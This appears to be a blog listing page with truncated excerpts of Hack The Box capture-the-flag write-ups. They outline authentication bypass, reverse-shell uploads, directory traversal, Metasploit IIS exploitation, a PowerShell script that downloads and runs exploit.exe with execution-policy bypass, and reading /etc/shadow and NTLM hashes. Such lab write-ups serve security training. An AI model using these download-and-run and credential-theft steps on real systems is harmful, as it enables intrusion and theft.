Hackthebox Magic writeup 3.7 (6)

Hackthebox Magic writeup

Introduction It is a medium machine from the hack the box platform.Which has simple authentication bypass to upload a malicious file and then jumping a user followed by privilege escalation using SUID Steps involved 1-Port Scan2-Visiting website3-Authentication bypass4-Encoding php inside image5-Uploading malicious file and bypassing security check6-Uploading php reverse shell7-Getting full shell8-Getting db user creds9-Jumping … Read more

Hackthebox ServMon writeup 3.4 (5)

Hackthebox ServMon writeup

Basic Information Difficulty-EasyType -WindowsPoints-20Maker-dmw0ngUser Blood- sampriti:08 mins, 06 seconds. Root Blood-sampriti:34 mins, 10 seconds. Steps involved 1-Port Scanning2-Searching exploit for NVMS-10003-Directory Traversal(Using Burp just POC)4-FTP enumeration5-Extracting passwords Using Directory Traversal 6-SSH login into Nadine(user.tx)7-Revising FTP and Nmap enumerations8-Checking Service on port 84439-Local port forwarding through SSH10-Searching exploit for NSClient++11-Exploiting NSClient with CLI12-Getting Root.txt Commands involved … Read more

Passwords for the Active Hack the Box machines 4.4 (7)

Passwords for the Active Hack the Box machines

New methods For linux -cat /etc/shadow Example this. root:$6$YIFGN9YscCV72BjFtx/tehbc7sQTJp09c5.:18277:0:99999:7:::So use the highlighted part as the password.So password = YIFGN9YscCV72BjFtx/ For Windows Use ntlm hash Example Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c:::  password = 31d6cfe0d16ae931b73c59d7e0c Old methods For linux 1- cat /etc/shadow2-copy whole hash(root)root:$6$YIFGN9YscCV72BjFtx/tehbc7sQTJp09c5.:18277:0:99999:7:::3-Then find it’s MD5 sum and that’s your password for writeup For windows 1-Find root hash with hashdump.exe … Read more

Hackthebox Granny writeup 0 (0)

Hackthebox Granny writeup

Commands used 1-nmap -sC -v exploit/windows/iis/iis_webdav_scstoragepathfromurl4-set targeturi /_vti_bin5-set rhosts lhost your_ip6-set lport 12347-run Steps involved Steps invloved 1-Port Scanning2-Searching exploit for IIS 6.03-Exploiting IIS with metasploit Port scan Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-16 23:06 EDT NSE: Loaded 119 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 23:06 Completed NSE … Read more

Hack the box Arctic writeup 2 (1)

Hack the box Arctic writeup

Steps involved 1-Port scanning2-Exploiting ColdFusion 8 on port 85003-Cracking hash4-uploading reverse shell5-privilage escalation 6-Getting root.txt Commands Used 1-nmap -sC -sV -O -p- -v -oV hash –wordlist=/root/Desktop/rockyou.txt4-echo $webclient = New-Object System.Net.WebClient >>wget.ps15-echo $url = “” >>wget.ps16-echo $file = “exploit.exe” >>wget.ps17- echo $webclient.DownloadFile($url,$file) >>wget.ps1 8-powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 Port Scanning Nmap 7.70 … Read more